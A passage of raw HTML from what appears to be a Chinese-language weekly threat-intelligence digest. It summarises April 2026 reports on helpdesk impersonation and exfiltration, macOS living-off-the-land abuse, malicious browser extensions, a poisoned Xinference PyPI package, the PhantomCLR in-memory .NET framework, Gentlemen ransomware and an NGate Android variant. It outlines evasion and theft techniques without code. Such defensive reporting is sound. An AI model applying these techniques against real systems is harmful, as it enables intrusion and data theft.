href="https://www.microsoft.com/en-us/security/blog/2026/04/18/crosstenant-helpdesk-impersonation-data-exfiltration-human-operated-intrusion-playbook/" target="_blank">https://www.microsoft.com/en-us/security/blog/2026/04/18/crosstenant-helpdesk-impersonation-data-exfiltration-human-operated-intrusion-playbook/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者通过跨租户Microsoft Teams冒充IT或服务台人员，利用社会工程学诱骗用户授予远程桌面访问权限（如Quick Assist），随后借助合法签名的应用程序进行DLL侧载、通过注册表加载恶意载荷、使用WinRM进行基于凭证的横向移动，并部署Rclone等工具将敏感数据外传至云存储，整个过程依赖合法工具和管理协议以融入正常企业活动。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5558974358974359" data-s="300,640" data-type="png" data-w="975" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034876" src="https://wechat2rss.xlab.app/img-proxy/?k=57edb630&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOqibPWlh7HpvuTggSe2BLaS5obA8dMZ6HrF4zgkbgOkjGvVl8cYQ3OYfMib8GVp17gQtLMadZIAZZUibVwe014O0bia22ictQUVvElmw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击者利用macOS原生功能实现“离地”攻击</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月21日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" target="_blank">https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究人员揭示了攻击者如何利用macOS原生功能实现“离地”攻击，通过远程应用脚本和Apple事件绕过安全控制进行远程命令执行与横向移动，滥用Spotlight元数据中的Finder注释字段来隐藏和投递载荷，并利用SMB、Netcat、Git、TFTP及SNMP等内置协议在完全脱离SSH监控的情况下进行工具包传输和持久化；为应对此类威胁，防御者需从静态文件扫描转向进程链、进程间通信异常监控，并通过MDM策略禁用不必要的管理服务。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4243654822335025" data-s="300,640" data-type="png" data-w="985" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034875" src="https://wechat2rss.xlab.app/img-proxy/?k=aba30723&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOqibhkYO2hRktw1QHhFWYVg3IicGnbN54FhJ2HribXnBP0daneR2BdPbIibicb7CL5hkIARjo0oRjcFSfbqoicXb9wicTj2c5JdqKd8ZAw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">伪装成TikTok视频下载器的扩展程序窃取13万用户数据</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月20日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://layerxsecurity.com/blog/stealtok-130k-users-compromised-by-data-stealing-tiktok-video-downloaders/" target="_blank">https://layerxsecurity.com/blog/stealtok-130k-users-compromised-by-data-stealing-tiktok-video-downloaders/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">一项大规模恶意浏览器扩展活动被发现，该活动涉及至少12个伪装成TikTok视频下载器的扩展程序，它们共享同一代码库并长期在Chrome和Edge商店中运营，这些扩展通过远程配置机制实现延迟6至12个月后才引入恶意功能，从而绕过商店审查，它们收集包括电池状态在内的高熵设备指纹数据，已影响超过13万用户，且许多扩展曾获得“精选”徽章以增加可信度，即使部分被移除，攻击者也能迅速克隆并重新发布，形成持续的运营模式。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.32727272727272727" data-s="300,640" data-type="png" data-w="825" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034877" src="https://wechat2rss.xlab.app/img-proxy/?k=86994d3b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq91lsVFyMIeMZvWVPgEz9q3Ox6mMiaLRe0icNicZJBXR1kf99BdgUN4wOfa9niaADuxzvzYRUKSPFdhxDFiaFUXYcc0q7aOiapxc9BL0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">又又一起AI相关供应链事件：Xinference PyPI (版本 2.6.0–2.6.2)供应链污染报告</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月23日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://blog.talosintelligence.com/the-n8n-n8mare/" target="_blank">https://blog.talosintelligence.com/the-n8n-n8mare/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">广受欢迎的Python AI推理包xinference在PyPI上被上传了三个恶意版本，当开发者导入该包时，混淆代码会自动执行，窃取云凭据、SSH密钥、K8s配置、API令牌、加密货币钱包等敏感数据并压缩发送至C2服务器；该包总下载量约68万次，恶意版本已被撤回，安全版本为2.5.0；代码中包含“hacked by teampcp”标记，但TeamPCP公开否认参与，暗示可能是模仿攻击，受影响用户应立即隔离环境、轮换所有凭据并降级至安全版本。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">05</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">PhantomCLR 行动：通过应用程序域劫持和内存中 .NET 滥用进行隐蔽执行</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月17日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.cyfirma.com/research/operation-phantomclr-stealth-execution-via-appdomain-hijacking-and-in-memory-net-abuse/" target="_blank">https://www.cyfirma.com/research/operation-phantomclr-stealth-execution-via-appdomain-hijacking-and-in-memory-net-abuse/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究人员深入分析了一个APT级别的后渗透框架，攻击者利用合法的Intel签名二进制文件IAStorHelp.exe，通过AppDomainManager劫持机制执行恶意代码，实现可信执行路径的滥用；整个攻击链始于钓鱼邮件中的ZIP附件，包含LNK诱饵、恶意配置文件、加密载荷及诱饵PDF，通过60秒素数计算和AES-128-CBC密钥推导循环（约41,410次迭代）实现沙箱逃逸，利用JIT trampoline技术在不调用VirtualAlloc等常规API的情况下执行shellcode，并通过反射式DLL加载和PEB遍历实现内存中的隐蔽执行；命令控制通信通过Amazon CloudFront CDN进行域前置，流量伪装成合法云服务，同时采用DLL注入风暴、堆遍历恢复、两阶段内存反取证清理及插件化架构增强韧性和隐蔽性；该框架主要针对中东和EMEA金融部门，其规避能力、模块化设计及对信任关系的滥用标志着攻击者已具备极高的操作成熟度，远超普通恶意软件。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034874" src="https://wechat2rss.xlab.app/img-proxy/?k=35649a26&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8HMiaicZuplicLbMAqGZEsof6YeVH1icEiaCIEXVk4icsCg7gKQs3oGyicz2RWTUZ5yHxj9ct0JhiaxNgLsTgX5znJGxMHicTUQluC2MLQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034873" src="https://wechat2rss.xlab.app/img-proxy/?k=0e8d7231&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9yg4y9QBAibU15Ecbt9N2vRS4NLUzOdHRhObzLfBvr697FhDQsApF2LN9x2R7wkU0LdZPUV694nHUiasASmsvVmpice5qmfA1rFI%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意代码情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034878" src="https://wechat2rss.xlab.app/img-proxy/?k=25191223&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq92cQ5zk12DKp1I1tjDHemXXWsOPF7UnsdU5MhuyvQ0Xa9648jwU6SBJBaOV73RnbbPsNbbsyvCFYOEcRKKibaKfPWCWBqPpcjI%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034879" src="https://wechat2rss.xlab.app/img-proxy/?k=f5941575&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqib8SeGktm1ibAib8hwugKaKBHyE8GYXhjHwlpuicaBeX3xVnfghZibncTX0o3gjKqXCKyaVia8ic01kQSlZSkCWibuPTSlyibmfXICjaPg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Gentlemen 勒索软件与SystemBC：代理背后的秘密</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月20日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://research.checkpoint.com/2026/dfir-report-the-gentlemen/" target="_blank">https://research.checkpoint.com/2026/dfir-report-the-gentlemen/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">The Gentlemen勒索软件即服务自2025年中出现，2026年已公开超320名受害者，通过90/10的高额分成吸引附属攻击者，使用Go编写的多平台勒索软件（Windows、Linux、ESXi）和C语言编写的ESXi变体，攻击者利用SystemBC代理、Cobalt Strike等工具，通过域控权限、GPO批量部署、禁用Windows Defender、删除卷影副本和日志、使用XChaCha20与X25519加密文件，ESXi变体可关闭虚拟机并创建持久化机制，Check Point Research通过访问实时C2服务器发现其实际控制超过1570个企业受害者，远超公开数字。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4484924623115578" data-s="300,640" data-type="png" data-w="796" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034881" src="https://wechat2rss.xlab.app/img-proxy/?k=a1f0ee99&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq9Cktg2Kqz3XrdqKiaVbutd4Fx7ySiaic6DMLwSTBctvkAtEr6jnCdF4A3xEgaUMmkgJvPZQmS4q3S84w4B8IbkrIhfuELawFkvJE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">新的 NGate 变种隐藏在合法安卓应用程序中</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月21日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.welivesecurity.com/en/eset-research/new-ngate-variant-hides-in-a-trojanized-nfc-payment-app/" target="_blank">https://www.welivesecurity.com/en/eset-research/new-ngate-variant-hides-in-a-trojanized-nfc-payment-app/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ESET研究人员发现了一个新型NGate恶意软件变种，该变种滥用合法Android应用HandyPay，攻击者利用AI生成代码对其进行了木马化，通过伪造巴西彩票网站和假Google Play页面诱导用户安装，一旦安装，恶意代码能够中继受害者支付卡的NFC数据并窃取PIN码，使攻击者能够进行非接触式ATM取款和未经授权的支付，该活动自2025年11月起持续针对巴西Android用户。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8022598870056498" data-s="300,640" data-type="png" data-w="885" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034882" src="https://wechat2rss.xlab.app/img-proxy/?k=c9770dd7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq8N9pUPOwJNFd5qHypoUQHgTyHITZgXffzOCUpHCRSLDmw53mgJLIrX5wjtnQD3V77uEmwvfuobgI0XgbQmsAqZGFMUNrIibLR0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span 